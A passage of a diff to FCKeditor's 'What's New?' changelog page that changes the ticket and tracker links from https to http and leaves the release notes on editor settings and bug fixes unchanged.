http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FCKeditor - What's New?</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> @@ -36,12 +36,12 @@ <ul> <li>It is now possible to set the default target when creating links, with the new "<strong>DefaultLinkTarget</strong>" setting. </li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/436">#436</a>] The new + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/436">#436</a>] The new "<strong>FirefoxSpellChecker</strong>" setting is available, to enable/disable the Firefox built-in spellchecker while typing. Even if word suggestions will not appear in the FCKeditor context menu, this feature is useful to quickly identify misspelled words.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/311">#311</a>] The new + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/311">#311</a>] The new "<strong>BrowserContextMenuOnCtrl</strong>" setting is being introduced, to enable/disable the ability of displaying the default browser's context menu when right-clicking with the CTRL key pressed.</li> @@ -49,93 +49,93 @@ <p> Fixed Bugs:</p> <ul> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/300">#300</a>] The fck_internal.css + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/300">#300</a>] The fck_internal.css file was not validating with the W3C CSS Validation Service.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/336">#336</a>] Ordered + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/336">#336</a>] Ordered list didn't keep the Type attribute properly (it was converted to lowercase when the properties dialog was opened again).</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/318">#318</a>] Multiple + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/318">#318</a>] Multiple linked images are merged in a single link in IE.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/350">#350</a>] The <marquee> + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/350">#350</a>] The <marquee> element will no longer append unwanted <p>&nbsp;</p> to the code.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/351">#351</a>] The content + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/351">#351</a>] The content was being lost for images or comments only HTML inserted directly in the editor source or loaded in the editor.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/388">#388</a>] Creating + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/388">#388</a>] Creating links in lines separated by <br> in IE can lead to a merge of the links.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/325">#325</a>] Calling + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/325">#325</a>] Calling the GetXHTML can distort visually the rendering in Firefox.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/391">#391</a>] When ToolbarLocation=Out, + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/391">#391</a>] When ToolbarLocation=Out, a "Security Warning" alert was being shown in IE if under https. Thanks to reister.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/360">#360</a>] Form "name" + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/360">#360</a>] Form "name" was being set to "[object]" if it contained an element with id="name".</li> <li>Fixed a type that was breaking the ColdFusion SpellerPages integration file when no spelling errors were found.</li> <li>The ColdFusion SpellerPages integration was not working it Aspell was installed in a directory with spaces in the name.</li> <li>Added option to SpellerPages to ignore "alt" attributes.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/451">#451</a>] Classes + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/451">#451</a>] Classes for images in IE didn't take effect immediately.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/430">#430</a>] Links with + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/430">#430</a>] Links with a class did generate a span in Firefox when removing them.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/274">#274</a>] The PHP + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/274">#274</a>] The PHP quick upload still tried to use the uppercased types instead of the lowercased ones. </li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/416">#416</a>] The PHP + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/416">#416</a>] The PHP quick upload didn't check for the existence of the folder before saving.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/467">#467</a>] If InsertHtml + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/467">#467</a>] If InsertHtml was called in IE with a comment (or any protected source at the beginning) it was lost.</li> <li>[<a target="_blank" href="https://sourceforge.net/tracker/?func=detail&aid=1518766&group_id=75348&atid=543653">SF BUG-1518766</a>] Mozilla 1.7.13 wasn't recognized properly as an old Gecko engine.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/324">#324</a>] Improperly + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/324">#324</a>] Improperly nested tags could lead to a crash in IE.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/455">#455</a>] Files and + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/455">#455</a>] Files and folders with non-ANSI names were returned with a double UTF-8 encoding in the PHP File Manager.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/273">#273</a>] The extensions + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/273">#273</a>] The extensions "sh", "shtml", "shtm" and "phtm" have been added to the list of denied extensions on upload.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/453">#453</a>] No more + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/453">#453</a>] No more errors when hitting del inside an empty table cell.</li> <li>The perl connector cgi file has been changed to Unix line endings.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/202">#202</a>] Regression: + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/202">#202</a>] Regression: The HR tag will not anymore break the contents loaded in the editor. </li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/508">#508</a>] The HR + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/508">#508</a>] The HR command had a typo.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/505">#505</a>] Regression: + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/505">#505</a>] Regression: IE crashed if a table caption was deleted.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/82">#82</a>] [<a target="_blank" - href="https://dev.fckeditor.net/ticket/359">#359</a>] <object> and <embed> + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/82">#82</a>] [<a target="_blank" + href="http://dev.fckeditor.net/ticket/359">#359</a>] <object> and <embed> tags are not anymore lost in IE.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/493">#493</a>] If the + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/493">#493</a>] If the containing form had a button named "submit" the "Save" command didn't work in Firefox.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/414">#414</a>] If tracing + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/414">#414</a>] If tracing was globally enabled in Asp.Net 2.0 then the Asp.Net connector did fail.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/520">#520</a>] The "Select + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/520">#520</a>] The "Select Field" properties dialog was not correctly handling select options with &, < and >.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/258">#258</a>] The Asp + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/258">#258</a>] The Asp integration didn't pass boolean values in English, using instead the locale of the server and failing.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/487">#487</a>] If an image + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/487">#487</a>] If an image with dimensions set as styles was opened with the image manager and then the dialog was canceled the dimensions in the style were lost.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/220">#220</a>] The creation + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/220">#220</a>] The creation of links or anchors in a selection that results on more than a single link created will not anymore leave temporary links in the source. All links will be defined as expected.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/220">#182</a>] [<a - target="_blank" href="https://dev.fckeditor.net/ticket/220">#261</a>] [<a target="_blank" - href="https://dev.fckeditor.net/ticket/220">#511</a>] Special characters, like + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/220">#182</a>] [<a + target="_blank" href="http://dev.fckeditor.net/ticket/220">#261</a>] [<a target="_blank" + href="http://dev.fckeditor.net/ticket/220">#511</a>] Special characters, like percent signs or accented chars, and spaces are now correctly returned by the File Browser.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/281">#281</a>] Custom + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/281">#281</a>] Custom toolbar buttons now render correctly in all skins.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/527">#527</a>] If the + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/527">#527</a>] If the configuration for a toolbar isn't fully valid, try to keep on parsing it.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/187">#187</a>] [<a - target="_blank" href="https://dev.fckeditor.net/ticket/435">#435</a>] [<a target="_blank" + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/187">#187</a>] [<a + target="_blank" href="http://dev.fckeditor.net/ticket/435">#435</a>] [<a target="_blank" href="https://sourceforge.net/tracker/?func=detail&aid=1612978&group_id=75348&atid=543653">SF BUG-1612978</a>] [<a target="_blank" href="https://sourceforge.net/tracker/?func=detail&aid=1163511&group_id=75348&atid=543653">SF BUG-1163511</a>] Updated the configuration options in the ColdFusion integration @@ -143,18 +143,18 @@ <li>[<a target="_blank" href="https://sourceforge.net/tracker/?func=detail&aid=1726781&group_id=75348&atid=543655">SF Patch-1726781</a>] Updated the upload class for asp to handle large files and other data in the forms. Thanks to NetRube.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/225">#225</a>] With ColdFusion, + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/225">#225</a>] With ColdFusion, the target directory is now being automatically created if needed when "quick uploading". Thanks to sirmeili.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/295">#295</a>] [<a - target="_blank" href="https://dev.fckeditor.net/ticket/510">#510</a>] Corrected some + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/295">#295</a>] [<a + target="_blank" href="http://dev.fckeditor.net/ticket/510">#510</a>] Corrected some path resolution issues with the File Browser connector for ColdFusion.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/239">#239</a>] The <xml> + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/239">#239</a>] The <xml> tag will not anymore cause troubles.</li> <li>[<a target="_blank" href="https://sourceforge.net/tracker/?func=detail&aid=1721787&group_id=75348&atid=543653">SF BUG-1721787</a>] If the editor is run from a virtual dir, the PHP connector will detect that and avoid generating a wrong folder.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/431">#431</a>] PHP: The + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/431">#431</a>] PHP: The File Browser now displays an error message when it is not able to create the configured target directory for files (instead of sending broken XML responses).</li> </ul> @@ -163,7 +163,7 @@ <p> Fixed Bugs:</p> <ul> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/279">#279</a>] The UTF-8 + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/279">#279</a>] The UTF-8 BOM was being included in the wrong files, affecting mainly PHP installations.</li> </ul> <h3> @@ -171,7 +171,7 @@ <p> New Features and Improvements:</p> <ul> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/118">#118</a>] The SelectAll + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/118">#118</a>] The SelectAll command now is available in Source Mode.</li> <li>The new open source FCKpackager sub-project is now available. It replaces the FCKeditor.Packager software to compact the editor source.</li> @@ -208,54 +208,54 @@ <li>[<a target="_blank" href="https://sourceforge.net/tracker/?func=detail&aid=1573191&group_id=75348&atid=543653">SF BUG-1573191</a>] The Html code inserted with FCK.InsertHtml didn't have the same protection for special tags.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/110">#110</a>] The OK + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/110">#110</a>] The OK button in dialogs had its width set as an inline style.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/113">#113</a>] [<a - target="_blank" href="https://dev.fckeditor.net/ticket/94">#94</a>] [<a target="_blank" + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/113">#113</a>] [<a + target="_blank" href="http://dev.fckeditor.net/ticket/94">#94</a>] [<a target="_blank" href="https://sourceforge.net/tracker/?func=detail&aid=1659270&group_id=75348&atid=543653">SF BUG-1659270</a>] ForcePasteAsPlainText didn't work in Firefox.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/114">#114</a>] The correct + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/114">#114</a>] The correct entity is now used to fill empty blocks when ProcessHTMLEntities is disabled.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/90">#90</a>] The editor + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/90">#90</a>] The editor was wrongly removing some <br> tags from the code.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/139">#139</a>] The CTRL+F + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/139">#139</a>] The CTRL+F and CTRL+S keystroke default behaviors are now preserved.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/138">#138</a>] We are + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/138">#138</a>] We are not providing a CTRL + ALT combination in the default configuration file because it may be incompatible with some keyboard layouts. So, the CTRL + ALT + S combination has been changed to CTRL + SHIFT + S.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/129">#129</a>] In IE, + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/129">#129</a>] In IE, it was not possible to paste if "Allow paste operation via script" was disabled in the browser security settings.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/112">#112</a>] The enter + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/112">#112</a>] The enter key now behaves correctly on lists with Firefox, when the EnterMode is set to 'br'.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/152">#152</a>] Invalid + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/152">#152</a>] Invalid self-closing tags are now being fixed before loading. </li> <li>A few tags were being ignored to the check for required contents (not getting stripped out, as expected). Fixed.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/202">#202</a>] The HR + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/202">#202</a>] The HR tag will not anymore break the contents loaded in the editor.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/211">#211</a>] Some invalid + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/211">#211</a>] Some invalid inputs, like "<p>" where making the caret disappear in Firefox.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/99">#99</a>] The <div> + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/99">#99</a>] The <div> element is now considered a block container if EnterMode=p|br. It acts like a simple block only if EnterMode=div.</li> <li>Hidden fields will now show up as an icon in IE, instead of a normal text field. They are also selectable and draggable, in all browsers.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/213">#213</a>] Styles + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/213">#213</a>] Styles are now preserved when hitting enter at the end of a paragraph.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/77">#77</a>] If ShiftEnterMode + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/77">#77</a>] If ShiftEnterMode is set to a block tag (p or div), the desired block creation in now enforced, instead of copying the current block (which is still the behavior of the simple enter).</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/209">#209</a>] Links and + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/209">#209</a>] Links and images URLs will now be correctly preserved with Netscape 7.1.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/165">#165</a>] The enter + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/165">#165</a>] The enter key now honors the EnterMode settings when outdenting a list item.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/190">#190</a>] Toolbars + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/190">#190</a>] Toolbars may be wrongly positioned. Fixed.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/254">#254</a>] The IgnoreEmptyParagraphValue + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/254">#254</a>] The IgnoreEmptyParagraphValue setting is now correctly handled in Firefox.</li> - <li>[<a target="_blank" href="https://dev.fckeditor.net/ticket/254">#248</a>] The behavior + <li>[<a target="_blank" href="http://dev.fckeditor.net/ticket/254">#248</a>] The behavior of the backspace key has been fixed on some very specific cases.</li> </ul> <h3> @@ -360,7 +360,7 @@ BUG-1565902</a>] [<a target="_blank" href="https://sourceforge.net/tracker/?func=detail&atid=543653&aid=1440631&group_id=75348">SF BUG-1440631</a>] IE was getting locked on some specific cases. Fixed.</li> <li>[<a target="_blank" href="https://sourceforge.net/tracker/?func=detail&atid=543653&aid=1582859&group_id=75348">SF - BUG-1582859</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1579507&group_id=75348&atid=543655">SF + BUG-1582859</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1579507&group_id=75348&atid=543655">SF Patch-1579507</a>] Firefox' spellchecker is now disabled during editing mode. Thanks to Alfonso Martinez.</li> <li>Fixed Safari and Opera detection system (for development purposes only).</li> @@ -441,7 +441,7 @@ BUG-1508341</a>] Fix for the ColdFusion script file of SpellerPages.</li> </ul> <p> - * This version has been partially sponsored by <a href="https://www.imedi.org/">Medical + * This version has been partially sponsored by <a href="http://www.imedi.org/">Medical Media Lab</a>.</p> <h3> Version 2.3.3</h3> @@ -468,7 +468,7 @@ the editor or simply place the template in the cursor position. This feature can be controlled by the "TemplateReplaceAll" and "TemplateReplaceCheckbox" configuration options.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1237693&group_id=75348&atid=543655">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1237693&group_id=75348&atid=543655">SF Patch-1237693</a>] A new configuration option (<strong>ProcessNumericEntities</strong>) is now available to tell the editor to convert non ASCII chars to their relative numeric entity references. It is disabled by default.</li> @@ -484,7 +484,7 @@ <li>Portuguese. Thanks to Bo Brandt.</li> </ul> </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1517322&group_id=75348&atid=543655">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1517322&group_id=75348&atid=543655">SF Patch-1517322</a>] It is now possible to define the start number on numbered lists. Thanks to Marcel Bennett.</li> <li>The Font Format combo will now reflect the EditorAreaCSS styles.</li> @@ -521,121 +521,121 @@ <li>Small security fixes to the File Browser connectors. </li> <li>[<a target="_blank" href="https://sourceforge.net/tracker/?func=detail&atid=543653&aid=1546226&group_id=75348">SF BUG-1546226</a>] Small fix to the ColdFusion CFC integration file.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&atid=543655&aid=1547768&group_id=75348">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&atid=543655&aid=1547768&group_id=75348">SF Patch-1407500</a>] The Word Cleanup function was breaking the HTML on pasting, on very specific cases. Fixed, thanks to Frode E. Moe.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1551979&group_id=75348&atid=543655">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1551979&group_id=75348&atid=543655">SF Patch-1551979</a>] [<a target="_blank" href="https://sourceforge.net/tracker/?func=detail&atid=543653&aid=1418066&group_id=75348">SF BUG-1418066</a>] [<a target="_blank" href="https://sourceforge.net/tracker/?func=detail&atid=543653&aid=1439621&group_id=75348">SF - BUG-1439621</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1501698&group_id=75348&atid=543653">SF + BUG-1439621</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1501698&group_id=75348&atid=543653">SF BUG-1501698</a>] Make FCKeditor work with application/xhtml+xml. Thanks to Arpad Borsos.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1547738&group_id=75348&atid=543655">SF - Patch-1547738</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1550595&group_id=75348&atid=543653">SF - BUG-1550595</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1540807&group_id=75348&atid=543653">SF - BUG-1540807</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1510685&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1547738&group_id=75348&atid=543655">SF + Patch-1547738</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1550595&group_id=75348&atid=543653">SF + BUG-1550595</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1540807&group_id=75348&atid=543653">SF + BUG-1540807</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1510685&group_id=75348&atid=543653">SF BUG-1510685</a>] Fixed problem with panels wrongly positioned when the editor is placed on absolute or relative positioned elements. Thanks to Filipe Martins.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1511294&group_id=75348&atid=543655">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1511294&group_id=75348&atid=543655">SF Patch-1511294</a>] Small fix for the File Browser compatibility with IE 5.5.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1503178&group_id=75348&atid=543655">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1503178&group_id=75348&atid=543655">SF Patch-1503178</a>] Small improvement to stop IE from loading smiley images when one smiley is quickly selected from a huge list of smileys. Thanks to stuckhere.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1549112&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1549112&group_id=75348&atid=543653">SF BUG-1549112</a>] The Replace dialog window now escapes regular expression specific characters in the find and replace fields.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1548788&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1548788&group_id=75348&atid=543653">SF BUG-1548788</a>] Updated the ieSpell download URL.</li> <li>In FF, the editor was throwing an error when closing the window. Fixed.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1538509&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1538509&group_id=75348&atid=543653">SF BUG-1538509</a>] The "type" attribute for text fields will always be set now.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1551734&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1551734&group_id=75348&atid=543653">SF BUG-1551734</a>] The SetHTML function will now update the editing area height no matter which editing mode is active.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1554141&group_id=75348&atid=543653">SF - BUG-1554141</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1565562&group_id=75348&atid=543653">SF - BUG-1565562</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1451056&group_id=75348&atid=543653">SF - BUG-1451056</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1478408&group_id=75348&atid=543653">SF - BUG-1478408</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1489322&group_id=75348&atid=543653">SF - BUG-1489322</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1513667&group_id=75348&atid=543653">SF - BUG-1513667</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1562134&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1554141&group_id=75348&atid=543653">SF + BUG-1554141</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1565562&group_id=75348&atid=543653">SF + BUG-1565562</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1451056&group_id=75348&atid=543653">SF + BUG-1451056</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1478408&group_id=75348&atid=543653">SF + BUG-1478408</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1489322&group_id=75348&atid=543653">SF + BUG-1489322</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1513667&group_id=75348&atid=543653">SF + BUG-1513667</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1562134&group_id=75348&atid=543653">SF BUG-1562134</a>] The protection of URLs has been enhanced and now it will not break URLs on very specific cases.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1545732&group_id=75348&atid=543653">SF - BUG-1545732</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1490919&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1545732&group_id=75348&atid=543653">SF + BUG-1545732</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1490919&group_id=75348&atid=543653">SF BUG-1490919</a>] No security errors will be thrown when loading FCKeditor in page inside a FRAME defined in a different domain.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1512817&group_id=75348&atid=543653">SF - BUG-1512817</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1571345&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1512817&group_id=75348&atid=543653">SF + BUG-1512817</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1571345&group_id=75348&atid=543653">SF BUG-1571345</a>] Fixed the "undefined" addition to the content when ShowBorders = false and FullPage = true in Firefox. Thanks to Brett.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1512798&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1512798&group_id=75348&atid=543653">SF BUG-1512798</a>] BaseHref will now work well on FullPage, even if no <head> is available.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1509923&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1509923&group_id=75348&atid=543653">SF BUG-1509923</a>] The DocumentProcessor is now called when using InserHtml().</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1505964&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1505964&group_id=75348&atid=543653">SF BUG-1505964</a>] The DOCTYPE declaration is now preserved when working in FullPage.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1553727&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1553727&group_id=75348&atid=543653">SF BUG-1553727</a>] The editor was throwing an error when inserting complex templates. Fixed.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1564930&group_id=75348&atid=543655">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1564930&group_id=75348&atid=543655">SF Patch-1564930</a>] [<a target="_blank" href="https://sourceforge.net/tracker/?func=detail&atid=543653&aid=1562828&group_id=75348">SF BUG-1562828</a>] In IE, anchors where incorrectly copied when using the Paste from Word button. Fixed, thanks to geirhelge.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1557709&group_id=75348&atid=543653">SF - BUG-1557709</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1421810&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1557709&group_id=75348&atid=543653">SF + BUG-1557709</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1421810&group_id=75348&atid=543653">SF BUG-1421810</a>] The link dialog now validates Popup Window names.</li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1556878&group_id=75348&atid=543653">SF + <li>[<a target="_blank" 